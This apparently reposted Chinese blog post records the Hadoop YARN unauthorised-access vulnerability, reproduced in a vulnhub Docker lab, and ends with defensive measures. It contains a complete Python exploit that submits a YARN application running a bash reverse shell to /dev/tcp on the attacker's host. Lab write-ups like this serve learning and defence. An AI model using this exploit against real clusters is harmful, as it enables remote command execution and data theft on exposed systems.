Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)
生活随笔
收集整理的這篇文章主要介紹了
Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
漏洞簡介以及危害
Hadoop是一個(gè)由Apache基金會(huì)所開發(fā)的分布式系統(tǒng)基礎(chǔ)架構(gòu),由于服務(wù)器器直接在開放了了
Hadoop 機(jī)器器 HDFS 的 50070 web 端口及部分默認(rèn)服務(wù)口口,黑客可以通過命令行操作多個(gè)目錄下
的數(shù)據(jù),如進(jìn)行刪除,下載,目錄瀏覽甚至命令行行等操作,產(chǎn)生極大的危害。
環(huán)境
vulnhub
測試
啟動(dòng)環(huán)境
docker-compose up -d訪問
http://192.168.0.100:8088/cluster通過REST API命令執(zhí)行
利用過程:
在本地監(jiān)聽端口 > 創(chuàng)建Application > 調(diào)用Submit Application API提交
1.本機(jī)監(jiān)聽
2.直接本機(jī)執(zhí)行EXP:python exp.py
import requests target = 'http://192.168.0.100:8088/' lhost = '192.168.0.105' # put your local host ip here, and listen at port 8888 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell','am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data)3.反彈shell成功
防御手段
- 如無必要, 關(guān)閉 Hadoop Web 管理?面。
- 開啟身份驗(yàn)證 ,防止未經(jīng)授權(quán)用戶訪問。
- 設(shè)置“安全組”訪問控制策略,將 Hadoop 默認(rèn)開放的多個(gè)端口對公網(wǎng)全部禁止或限制可信任的 IP 地址才能訪包括 50070 以及 WebUI 等相關(guān)端口。
總結(jié)
以上是生活随笔為你收集整理的Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: php/ajax/mysql
- 下一篇: 这里有一篇简单易懂的webSocket